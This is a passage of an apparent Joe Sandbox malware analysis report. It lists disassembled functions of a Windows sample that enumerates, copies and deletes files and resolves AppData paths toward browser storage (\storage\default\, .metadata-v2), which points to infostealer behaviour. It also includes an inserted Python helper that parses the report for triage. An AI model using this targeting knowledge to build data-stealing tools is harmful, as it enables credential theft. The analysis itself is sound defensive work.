                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecb62786634508c4a78b203fdc083179c60dec3d54f891109a0b4f7e8a1949db
                                • Instruction ID: 588db79c240ff41e5ad21364f7cbd194acc2b6ae8d64bc26b401e3768bb965bb
                                • Opcode Fuzzy Hash: ecb62786634508c4a78b203fdc083179c60dec3d54f891109a0b4f7e8a1949db
                                • Instruction Fuzzy Hash: D5412BF39087185FE304AE28EC956B6B7D5EB94320F1A863DEAC593784FD7654048242
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4968438efef507c94f0d7337039705d717f81d80a763be5ad127cdc6cdfa42c
                                • Instruction ID: 2e65006dd97522a87116cf0cd1b57cdd170d9f71934e987083eaf0bb49fb63b3
                                • Opcode Fuzzy Hash: a4968438efef507c94f0d7337039705d717f81d80a763be5ad127cdc6cdfa42c
                                • Instruction Fuzzy Hash: E231F8F294C3049FF304AE28DCC1BBAB7E5EB54351F1A492DE6C582684E67A18458747
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a009fb6e9687d7af4e793eff8f81060a959e7947603f79509e85f7b16a92c575
                                • Instruction ID: 8663a5b4f1f773975d6a3fa1f867c71c64106356b57fd0dc5d7dc17c2cf0ee68
                                • Opcode Fuzzy Hash: a009fb6e9687d7af4e793eff8f81060a959e7947603f79509e85f7b16a92c575
                                • Instruction Fuzzy Hash: 0D1114B280C604DFE7027F68DC862AAFBE0FF18310F06092DD6E583610E735A9509B87
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C8636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 009C86AA
                                • StrStrA.SHLWAPI(?,010CEBE8), ref: 009C86CF
                                • lstrcpyn.KERNEL32(00BE93D0,?,00000000), ref: 009C86EE
                                • lstrlen.KERNEL32(?), ref: 009C8701
                                • wsprintfA.USER32 ref: 009C8711
                                • lstrcpy.KERNEL32(?,?), ref: 009C8727
                                • StrStrA.SHLWAPI(?,010CEC00), ref: 009C8754
                                • lstrcpy.KERNEL32(?,00BE93D0), ref: 009C87B4
                                • StrStrA.SHLWAPI(?,010CEC90), ref: 009C87E1
                                • lstrcpyn.KERNEL32(00BE93D0,?,00000000), ref: 009C8800
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: cc8bb12ae5fd2671ef40fa7b1d11eb31204aebb23b1905d852918b5781f37166
                                • Instruction ID: 99787e9a33067090159b29c7d0e035cdf09518aa3bf0918e690f144e05520c90
                                • Opcode Fuzzy Hash: cc8bb12ae5fd2671ef40fa7b1d11eb31204aebb23b1905d852918b5781f37166
                                • Instruction Fuzzy Hash: F9F17D72900554AFCB11DB64DD88AEBB7B9EF88700F114999F90AE7351DF30AE05CBA1
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1F9F
                                • lstrlen.KERNEL32(010C88C8), ref: 009B1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 009B1FE3
                                • lstrlen.KERNEL32(009E1794), ref: 009B1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B200E
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B204D
                                • lstrlen.KERNEL32(009E1794), ref: 009B2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2075
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B2081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B20AC
                                • lstrlen.KERNEL32(?), ref: 009B20E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2104
                                • lstrcat.KERNEL32(00000000,?), ref: 009B2112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2139
                                • lstrlen.KERNEL32(009E1794), ref: 009B214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B216B
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009B2177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009B21A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B21D4
                                • lstrlen.KERNEL32(?), ref: 009B21EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B220A
                                • lstrcat.KERNEL32(00000000,?), ref: 009B2218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2242
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B227F
                                • lstrlen.KERNEL32(010CD280), ref: 009B228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B22B1
                                • lstrcat.KERNEL32(00000000,010CD280), ref: 009B22B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B22F7
                                • lstrcat.KERNEL32(00000000), ref: 009B2304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009B2356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B2382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009B23BF
                                • DeleteFileA.KERNEL32(00000000), ref: 009B23F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 009B2444
                                • FindClose.KERNEL32(00000000), ref: 009B2453
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: d7e082215dfe9645c1ccac08c622d2394d5bf59129bc35f7b06716e81db2774f
                                • Instruction ID: ad07fddab8dedfd5ea4a77a9b8340eb0196b9976169540a408e09d6887ab48de
                                • Opcode Fuzzy Hash: d7e082215dfe9645c1ccac08c622d2394d5bf59129bc35f7b06716e81db2774f
                                • Instruction Fuzzy Hash: C7E15E31A1165A9BDB21EFA4DF89BEE77B9EF84720F044424F809AB251DB34DD05CB90
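                                 The call-site list of the record above (FindNextFileA/FindClose, CopyFileA, DeleteFileA, lstrcat at 009B1F9F..009B2453) and the SHGetFolderPathA call in the next record describe what each function does only implicitly, one API at a time. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" lines and "Associated" dump names in exactly the format printed on this page, tags the behaviour the API set implies, decodes the constant arguments the report shows (the CSIDL 0x1A passed to SHGetFolderPathA, the bFailIfExists flag passed to CopyFileA), and maps each ref address to the .sdmp it falls in. Two assumptions are mine: the fourth dotted field of an .sdmp name is the region base and the fifth its page protection (this matches the values on the page but is my reading of the naming scheme), and, since region sizes are not listed, a call site is assigned to the highest base not above its address. The sample lines are constructed from records on this page.

                                 ```python
"""Summarise a Joe Sandbox function record: parse its 'APIs' call sites and its
'Associated' memory-dump names, tag capabilities, decode constant arguments, and
map each call site to the dump region it lives in.
Added example, not Joe Sandbox code; see parse_sdmp_name for the field assumption."""
import re
from collections import Counter

# Constructed sample: call-site lines copied from two records on this page
# (the file-handling routine at 009B1F9F.. and the folder lookup at 009C64AA).
SAMPLE_API_LINES = """\
• lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B1F9F
• lstrlen.KERNEL32(010C88C8), ref: 009B1FAE
• lstrcat.KERNEL32(00000000,?), ref: 009B1FE3
• wsprintfA.USER32 ref: 009C8711
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 009B2356
• DeleteFileA.KERNEL32(00000000), ref: 009B23F7
• FindNextFileA.KERNEL32(00000000,?), ref: 009B2444
• FindClose.KERNEL32(00000000), ref: 009B2453
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009C64AA
"""

# Constructed sample: a subset of the 'Associated' dump names listed on this page.
SAMPLE_SDMP_NAMES = [
    "00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp",
]

# '• api.MODULE(arg,arg), ref: ADDR'  or  '• api.MODULE ref: ADDR' (no argument list)
API_LINE = re.compile(
    r"^[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Windows page-protection constants (winnt.h), used to label each dump region.
PAGE_PROTECT = {0x02: "R", 0x04: "RW", 0x20: "RX", 0x40: "RWX", 0x80: "RWX-copy"}

# CSIDL folder ids (shlobj.h) for decoding SHGetFolderPath's second argument.
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
         0x23: "CSIDL_COMMON_APPDATA", 0x28: "CSIDL_PROFILE"}

# API names that, seen together in one function, indicate a behaviour.
CAPABILITIES = {
    "file_enumeration": {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW", "FindClose"},
    "file_copy": {"CopyFileA", "CopyFileW"},
    "file_delete": {"DeleteFileA", "DeleteFileW"},
    "known_folder_lookup": {"SHGetFolderPathA", "SHGetFolderPathW"},
}


def parse_api_lines(text):
    """Turn report call-site lines into dicts; a '?' argument means 'not recovered'."""
    calls = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = API_LINE.match(line)
        if m is None:
            raise ValueError("unrecognised API line: " + line)
        args = m["args"].split(",") if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)})
    return calls


def parse_sdmp_name(name):
    """Assumption: dotted field 4 is the region base address, field 5 the page protection."""
    fields = name.split(".")
    base, protect = int(fields[3], 16), int(fields[4], 16)
    return {"name": name, "base": base, "protect": PAGE_PROTECT.get(protect, hex(protect))}


def region_for(addr, regions):
    """Region with the highest base not above addr (sizes are not listed, so this
    assumes the regions are contiguous); None if addr is below every base."""
    candidates = [r for r in regions if r["base"] <= addr]
    return max(candidates, key=lambda r: r["base"]) if candidates else None


def decode_constant_args(call):
    """Explain the constant arguments the report shows for security-relevant APIs."""
    api, args = call["api"], call["args"]
    if api.startswith("SHGetFolderPath") and len(args) > 1 and args[1] != "?":
        csidl = int(args[1], 16) & 0xFF  # CSIDL_FLAG_* bits sit above the low byte
        return CSIDL.get(csidl, "CSIDL_0x%02X" % csidl)
    if api.startswith("CopyFile") and len(args) > 2 and args[2] != "?":
        return "bFailIfExists=TRUE (no overwrite)" if int(args[2], 16) else "bFailIfExists=FALSE (overwrites)"
    return None


def summarise(api_text, sdmp_names):
    """One dict a triager can read: API counts, modules, capability tags,
    call site -> dump file, and decoded constant arguments."""
    calls = parse_api_lines(api_text)
    regions = [parse_sdmp_name(n) for n in sdmp_names]
    names = {c["api"] for c in calls}
    return {
        "api_counts": Counter(c["api"] for c in calls),
        "modules": sorted({c["module"] for c in calls}),
        "capabilities": sorted(tag for tag, apis in CAPABILITIES.items() if names & apis),
        "call_sites": {c["ref"]: region_for(c["ref"], regions)["name"] for c in calls},
        "notes": {c["api"]: decode_constant_args(c) for c in calls if decode_constant_args(c)},
    }


if __name__ == "__main__":
    s = summarise(SAMPLE_API_LINES, SAMPLE_SDMP_NAMES)
    print(s["capabilities"], s["notes"])
    for ref, dump in sorted(s["call_sites"].items()):
        print("%08X -> %s" % (ref, dump))
                                 ```

                                 On the sample the helper tags the routine as file enumeration plus copy plus delete, reports that CopyFileA is called with bFailIfExists set (an existing destination is not overwritten) and that SHGetFolderPathA resolves CSIDL_APPDATA, and places both 009B1F9F and 009C64AA in the 009B1000 RWX dump, which agrees with the "Source File" line of each record. Treat the protection label as a hint only: a 0x40 region is consistent with the report's "changes PE section rights" finding, but the region's size and any later VirtualProtect changes are not visible in the names.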
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6445
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C6480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009C64AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C64E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C6537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 05a0015fa58356839f6bff9cd3b718469cdb725b2b0e5276a968727e0f329919
                                • Instruction ID: a4b15de091c373555ca68dd380a7d9bad3f976a6ae191533356ba6c787f1c6fb
                                • Opcode Fuzzy Hash: 05a0015fa58356839f6bff9cd3b718469cdb725b2b0e5276a968727e0f329919
                                • Instruction Fuzzy Hash: 22F1AF70D012469BDB21EF78DA89BAE77B9EF84310F144428F845EB291DB34DD45CB92
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C43A3
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 009C4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 009C443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 009C44DF
                                • lstrlen.KERNEL32(009E1794), ref: 009C44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C4507
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 009C451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 009C4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009C45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C467B
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: f73fb6e9c8df98d0e66e73506f2e8fb616d5dcd5bab01dad05ac353f691d29ce
                                • Instruction ID: b551fb291303703ad9671bb95ae76196988194cc8cf377e3324c92dd9c46ecaa
                                • Opcode Fuzzy Hash: f73fb6e9c8df98d0e66e73506f2e8fb616d5dcd5bab01dad05ac353f691d29ce
                                • Instruction Fuzzy Hash: F3B17F71A116469BDB21EFB8DF99BAE77ADEF84310F140028B845E7291DB30DD058B92
                                APIs
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009C5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C58F8
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5988
                                • lstrlen.KERNEL32(009E1794), ref: 009C599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C59B9
                                • lstrcat.KERNEL32(00000000,009E1794), ref: 009C59C5
                                • lstrlen.KERNEL32(010CD1A8), ref: 009C59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 009C5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 009C5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5BB5
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009C5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 009C5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
